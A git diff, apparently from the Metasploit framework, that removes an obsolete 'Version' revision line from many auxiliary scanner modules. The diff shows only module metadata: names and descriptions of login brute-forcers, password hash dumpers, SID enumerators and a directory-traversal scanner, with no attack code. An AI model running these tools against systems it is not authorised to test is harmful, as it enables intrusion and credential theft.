--git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 84b4d3e388..a955b4f827 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Robots.txt Content Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect robots.txt files and analize its content', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 4746873573..730217ba95 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects User Bruteforcer', - 'Version' => '$Revision$', 'Description' => 'This module attempts to bruteforce SAP BusinessObjects users. The dswsbobje interface is only used to verify valid credentials for CmcApp. Therefore, any valid credentials that have been identified can be leveraged by diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index a5448924e0..56a6b32f1f 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects Web User Bruteforcer', - 'Version' => '$Revision$', 'Description' => 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index ccd921c1ef..415ca736ee 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects User Enumeration', - 'Version' => '$Revision$', 'Description' => %Q{ This module simply attempts to enumerate SAP BusinessObjects users.The dswsbobje interface is only used to verify valid diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index b3a0e25359..be3de4bd49 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SAP BusinessObjects Version Detection', - 'Version' => '$Revision$', 'Description' => 'This module simply attempts to identify the version of SAP BusinessObjects.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index cf9972c111..ee51941166 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Page Scraper', - 'Version' => '$Revision$', 'Description' => 'Scrap defined data from a specific web page based on a regular expresion', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/sqlmap.rb b/modules/auxiliary/scanner/http/sqlmap.rb index f4b63d9ffe..070f5515a6 100644 --- a/modules/auxiliary/scanner/http/sqlmap.rb +++ b/modules/auxiliary/scanner/http/sqlmap.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Bernardo Damele A. G. ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://sqlmap.sourceforge.net'], diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index fd9303b7ab..731806c4c7 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary the attack to pivot to another part of the network). }, 'Author' => ['willis'], - 'Version' => '$Revision$', 'References' => [ 'URL','http://wiki.squid-cache.org/SquidFaq/SecurityPitfalls' diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index ec1e63e7a2..8d9196efde 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'Troy Rose ', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index c7301f4d7a..da51bf377f 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -19,7 +19,6 @@ class Metasploit4 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP SSL Certificate Information', - 'Version' => '$Revision$', 'Description' => 'Parse the server SSL certificate to obtain the common name and signature algorithm', 'Author' => [ diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 4d4509658f..65370ea458 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Subversion Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect subversion directories and files and analize its content. Only SVN Version > 7 supported', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 697b48fd46..fbfc1c6f99 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Apache Tomcat User Enumeration', - 'Version' => '$Revision$', 'Description' => %q{ Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40. diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index dded2387bb..fb6978cdea 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Tomcat Application Manager Login Utility', - 'Version' => '$Revision$', 'Description' => 'This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.', 'References' => [ diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 55c31af0dd..bdafbb01db 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP TRACE Detection', - 'Version' => '$Revision$', 'Description' => 'Test if TRACE is actually enabled. 405 (Apache) 501(IIS) if its disabled, 200 if it is', 'Author' => ['CG'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 64e3fd9398..bcf15c8e93 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP trace.axd Content Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect trace.axd files and analize its content', 'Author' => ['c4an'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb index 76b488add0..99eebecee0 100644 --- a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'VMware Server Directory Traversal Vulnerability', - 'Version' => '$Revision$', 'Description' => 'This modules exploits the VMware Server Directory Traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 @@ -27,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary the gueststealer tool.', 'Author' => 'CG' , 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ], diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 0e5f56762c..597e8190b4 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP WebDAV Internal IP Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect webservers internal IPs though WebDAV', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 6757e37a93..66399b0fef 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP WebDAV Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect webservers with WebDAV enabled', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 0ca4fbbd9c..08676d37ab 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP WebDAV Website Content Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect webservers disclosing its content though WebDAV', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index 12d8d411a5..7c62b4ca6a 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'IMAP4 Banner Grabber', - 'Version' => '$Revision$', 'Description' => 'IMAP4 Banner Grabber', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index c20e5eb245..8f4925b0da 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lotus Domino Password Hash Collector', - 'Version' => '$Revision$', 'Description' => 'Get users passwords hashes from names.nsf page', 'Author' => 'Tiago Ferreira ', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index b384f447c3..769d271791 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lotus Domino Brute Force Utility', - 'Version' => '$Revision$', 'Description' => 'Lotus Domino Authentication Brute Force Utility', 'Author' => 'Tiago Ferreira ', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index fbcc128e02..e41069737e 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Lotus Domino Version', - 'Version' => '$Revision$', 'Description' => 'Several checks to determine Lotus Domino Server Version.', 'Author' => ['CG'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index 017b667f0a..6c980bbeb1 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Auxiliary and implementation of the InterBase server from InterBase Services Manager. }, - 'Version' => '$Revision$', 'Author' => [ 'Ramon de C Valle', diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index 309c4b91d4..ac632652e6 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Java RMI Server Insecure Endpoint Code Execution Scanner', - 'Version' => '$Revision$', 'Description' => 'Detect Java RMI endpoints', 'Author' => ['mihi', 'hdm'], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb index 99248b3512..6437aa5f4a 100644 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ b/modules/auxiliary/scanner/misc/redis_server.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize(info={}) super(update_info(info, 'Name' => 'Redis-server Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module scans for Redis server. By default Redis has no auth. If auth (password only) is used, it is then possible to execute a brute force attack on diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index 2bf05ae229..c2d6a49c64 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever', - 'Version' => '$Revision$', 'Description' => %q{ This module takes advantage of a protocol design issue with the Rosewill admin executable in order to retrieve passwords, allowing remote attackers to take diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 783c46412b..7732e03cf6 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary program entries and their running port numbers. }, 'Author' => [''], - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.ietf.org/rfc/rfc1057.txt'], diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 140c1e7623..d0d0c489a0 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['MC'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Sep 25 2009' )) diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 0628489b17..a07f5418c2 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MSSQL Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 49ca3bc29d..0016810eb1 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MSSQL Login Utility', - 'Version' => '$Revision$', 'Description' => 'This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).', 'Author' => 'MC', 'References' => diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index cb4f642e44..d541980f1e 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MSSQL Ping Utility', - 'Version' => '$Revision$', 'Description' => 'This module simply queries the MSSQL instance for information.', 'Author' => 'MC', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index 96f8285fbd..77bc86879a 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MySQL Authentication Bypass Password Dump', - 'Version' => '$Revision$', 'Description' => %Q{ This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index 814a828f26..229cbafdc7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index 0d82a5f821..27627da977 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'MYSQL Schema Dump', - 'Version' => '$Revision$', 'Description' => %Q{ This module extracts the schema information from a MySQL DB server. diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index fa59252e43..033c134151 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ Enumerates the version of MySQL servers }, - 'Version' => '$Revision$', 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/netbios/nbname.rb b/modules/auxiliary/scanner/netbios/nbname.rb index db2e6ffbe2..ecfc066a04 100644 --- a/modules/auxiliary/scanner/netbios/nbname.rb +++ b/modules/auxiliary/scanner/netbios/nbname.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'NetBIOS Information Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover host information through NetBIOS', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/netbios/nbname_probe.rb b/modules/auxiliary/scanner/netbios/nbname_probe.rb index cb353bf92f..5e52d6dc7f 100644 --- a/modules/auxiliary/scanner/netbios/nbname_probe.rb +++ b/modules/auxiliary/scanner/netbios/nbname_probe.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'NetBIOS Information Discovery Prober', - 'Version' => '$Revision$', 'Description' => 'Discover host information using sequential NetBIOS Probes', 'Author' => ['hdm', 'todb'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb index 67d93598a5..1de98fba25 100644 --- a/modules/auxiliary/scanner/nfs/nfsmount.rb +++ b/modules/auxiliary/scanner/nfs/nfsmount.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary This module scans NFS mounts and their permissions. }, 'Author' => [''], - 'Version' => '$Revision$', 'References' => [ ['CVE', '1999-0170'], diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index dd80670e53..676b534677 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'NTP Monitor List Scanner', - 'Version' => '$Revision$', 'Description' => 'Obtain the list of recent clients from an NTP server', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index 8894235695..eb1f221ba4 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 853eabcc5e..150d6a5463 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Oracle iSQL*Plus Login Utility', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to authenticate against an Oracle ISQL*Plus administration web site using username and password combinations indicated diff --git a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb index 4aef247c17..a4b51ffa92 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Oracle isqlplus SID Check', - 'Version' => '$Revision$', 'Description' => %q{ This module attempts to bruteforce the SID on the Oracle application server iSQL*Plus login pages. It does this by testing Oracle error responses returned in the HTTP response. diff --git a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb index 14f29de481..b11a8bef81 100644 --- a/modules/auxiliary/scanner/oracle/oracle_hashdump.rb +++ b/modules/auxiliary/scanner/oracle/oracle_hashdump.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Oracle Password Hashdump', - 'Version' => '$Revision$', 'Description' => %Q{ This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index 8d00242322..fb8509adf5 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ 'CG', 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009' )) diff --git a/modules/auxiliary/scanner/oracle/spy_sid.rb b/modules/auxiliary/scanner/oracle/spy_sid.rb index 8848fdd89d..5326fc21a2 100644 --- a/modules/auxiliary/scanner/oracle/spy_sid.rb +++ b/modules/auxiliary/scanner/oracle/spy_sid.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module makes a request to the Oracle Application Server in an attempt to discover the SID. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb index 09e0628831..e9c6e24622 100644 --- a/modules/auxiliary/scanner/oracle/tnslsnr_version.rb +++ b/modules/auxiliary/scanner/oracle/tnslsnr_version.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => ['CG'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'DisclosureDate' => 'Jan 7 2009')) register_options( diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index 47e6150d4a..df0ab6d9aa 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module simply makes a authenticated request to retrieve the sid from the Oracle XML DB httpd server. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb index 2130bce7eb..aa3f7baec7 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan's default oracle password list. }, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://dsecrg.com/files/pub/pdf/Different_ways_to_guess_Oracle_database_SID_(eng).pdf' ], diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb index c11c6e5814..e89007576c 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb @@ -18,7 +18,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PcAnywhere Login Scanner', - 'Version' => '$Revision$', 'Description' => %q{ This module will test pcAnywhere logins on a range of machines and report successful logins. diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb index 0f57fbb37d..61a162fd3e 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PcAnywhere TCP Service Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover active pcAnywhere services through TCP', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb index 25dc671205..76fc5777b8 100644 --- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb +++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'PcAnywhere UDP Service Discovery', - 'Version' => '$Revision$', 'Description' => 'Discover active pcAnywhere services through UDP', 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/pop3/pop3_login.rb b/modules/auxiliary/scanner/pop3/pop3_login.rb index 97fe2252ee..e895ba5546 100644 --- a/modules/auxiliary/scanner/pop3/pop3_login.rb +++ b/modules/auxiliary/scanner/pop3/pop3_login.rb @@ -17,7 +17,6 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'POP3 Login Utility', 'Description' => 'This module attempts to authenticate to an POP3 service.', - 'Version' => '$Revision$', 'Author' => [ '==[ Alligator Security Team ]==', diff --git a/modules/auxiliary/scanner/pop3/pop3_version.rb b/modules/auxiliary/scanner/pop3/pop3_version.rb index 0f902ef5f4..9131397296 100644 --- a/modules/auxiliary/scanner/pop3/pop3_version.rb +++ b/modules/auxiliary/scanner/pop3/pop3_version.rb @@ -16,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'POP3 Banner Grabber', - 'Version' => '$Revision$', 'Description' => 'POP3 Banner Grabber', 'Author' => 'hdm', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/portscan/ftpbounce.rb 